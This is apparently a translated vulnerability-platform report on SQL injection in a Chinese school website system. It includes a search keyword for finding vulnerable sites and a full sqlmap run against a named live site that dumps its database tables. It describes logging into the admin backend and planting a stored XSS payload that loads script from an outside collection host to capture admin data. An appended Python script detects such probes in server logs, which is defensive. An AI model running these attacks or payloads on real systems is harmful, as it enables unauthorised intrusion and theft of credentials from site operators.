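2014-07-14: Details reported to the vendor; awaiting vendor handling
2014-07-19: Vendor confirmed; details disclosed to the vendor only
2014-07-22: Details opened to third-party security partners
2014-09-12: Details disclosed to core white hats and experts in related fields
2014-09-22: Details disclosed to regular white hats
2014-10-02: Details disclosed to intern white hats
2014-10-12: Details disclosed to the public
Oh my.. have my friends been missing me? It has been so long since I last submitted a vulnerability.. OK.. this time let me try submitting an SQL injection vulnerability... hehe. 狗哥, please rate this one as a major vendor... This is only a preview. I am researching getshell further.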
"校无忧学校网站系统"
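This is the keyword. You can wrap it in "" or leave them off! Found through a Baidu search.
OK.. the above is the information I put together.. hehe.. Then I collected a few websites! The following websites are for testing by the National Internet Emergency Center (CNCERT) only: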
And EDU has already been owned too..
OK.. that's it for now... Do they all have GET injection?
[root@Hacker~]# Sqlmap sqlmap -u "http://www.tajx.com/TeacherView.asp?id=12"

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:18:40

[20:18:40] [INFO] testing connection to the target url
[20:18:41] [INFO] testing if the url is stable, wait a few seconds
[20:18:43] [WARNING] url is not stable, sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[20:18:46] [INFO] testing if GET parameter 'id' is dynamic
[20:18:46] [INFO] confirming that GET parameter 'id' is dynamic
[20:18:47] [WARNING] GET parameter 'id' appears to be not dynamic
[20:18:47] [INFO] heuristics detected web page charset 'GB2312'
[20:18:47] [WARNING] reflective value(s) found and filtering out
[20:18:47] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: Microsoft Access)
[20:18:47] [INFO] testing for SQL injection on GET parameter 'id'
[20:18:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:18:49] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
parsed error message(s) showed that the back-end DBMS could be Microsoft Access. Do you want to skip test payloads specific for other DBMSes? [Y/n]
[20:18:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:18:52] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[20:19:22] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[20:19:33] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 30 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=12 AND 5910=5910
---
[20:20:11] [INFO] testing Microsoft Access
[20:20:12] [INFO] confirming Microsoft Access
[20:20:13] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[20:20:13] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 30 times
[20:20:13] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
[20:20:13] [INFO] fetched data logged to text files under 'D:\??\???~1\tools\????\SQLMAP~3\Bin\output\www.tajx.com'

[*] shutting down at 20:20:13
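After using 阿D to view the account and password, I logged in to the admin backend.. ready for deeper research! Then on the front end I saw a
Wrote in the XSS code: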
<script src="http://xss.esotsec.org/?u=57a23e" > </script>
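Then I clicked to view it in the admin backend
Although it displayed a blank page
the XSS testing platform had already received the information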
Database: Microsoft_Access_masterdb
[6 tables]
+----------+
| admin    |
| feedback |
| menu     |
| news     |
| school   |
| student  |
+----------+

[21:44:46] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 3142 times
[21:44:46] [INFO] fetched data logged to text files under 'D:\??\???~1\tools\????\SQLMAP~3\Bin\output\www.tajx.com'

[*] shutting down at 21:44:46
Going to dig deeper! Give me a higher rank, ideally mark it as featured or give me a certificate.. haha
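The sqlmap output above shows the footprint this probing leaves in web server logs: non-numeric values in the integer `id` parameter of the `*View.asp` pages, boolean pairs such as `AND 5910=5910`, and a run of HTTP 500 responses. The detection script below is an added example, not part of the original report; the log layout, sample lines, client addresses and the `min_probes` threshold are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample, simplified layout (an assumption, not real IIS field order):
# date time client-ip method uri-stem uri-query status
SAMPLE_LOG = """\
2014-07-14 20:18:41 203.0.113.7 GET /TeacherView.asp id=12 200
2014-07-14 20:18:47 203.0.113.7 GET /TeacherView.asp id=12%27 500
2014-07-14 20:18:49 203.0.113.7 GET /TeacherView.asp id=12+AND+5910=5910 200
2014-07-14 20:18:50 203.0.113.7 GET /TeacherView.asp id=12+AND+5910=5911 500
2014-07-14 20:19:02 198.51.100.20 GET /NewsView.asp id=35 200
2014-07-14 20:19:05 198.51.100.20 GET /NewsView.asp id=abc 500
"""

VIEW_PAGE = re.compile(r"/\w*View\.asp$", re.IGNORECASE)
ID_PARAM = re.compile(r"(?:^|&)id=([^&]*)", re.IGNORECASE)
BOOLEAN_PAIR = re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+", re.IGNORECASE)

def classify_id(raw_value):
    """Return None for a plain numeric id, otherwise a reason label."""
    value = unquote_plus(raw_value)
    if re.fullmatch(r"[0-9]+", value):
        return None
    if "'" in value or '"' in value:
        return "quote"
    if BOOLEAN_PAIR.search(value):
        return "boolean-probe"
    return "non-numeric"

def scan(log_text, min_probes=3):
    """Map client IP -> counters, for clients with at least min_probes bad id values."""
    per_client = {}
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 7:
            continue  # skip malformed or header lines
        client, method, stem, query, status = fields[2:]
        match = ID_PARAM.search(query)
        if method != "GET" or not VIEW_PAGE.search(stem) or not match:
            continue
        reason = classify_id(match.group(1))
        if reason is None:
            continue
        stats = per_client.setdefault(client, Counter())
        stats[reason] += 1
        stats["probes"] += 1
        if status == "500":
            stats["http_500"] += 1  # errors triggered by the bad id value
    return {ip: dict(s) for ip, s in per_client.items() if s["probes"] >= min_probes}
```

On the constructed sample, `scan(SAMPLE_LOG)` reports only the client that sent the quote and the paired boolean conditions; the single mistyped `id=abc` stays below the threshold.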
Severity: High
Vulnerability Rank: 16
Confirmed: 2014-07-19 11:41
None yet
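Huh????
A white hat you follow, 泳少, published a vulnerability: A school management system vulnerability gift-pack collection (including stored XSS and SQL injection vulnerabilities)
@光刃 What's up?
@zhxs This... sigh.. sad.. it's not the front end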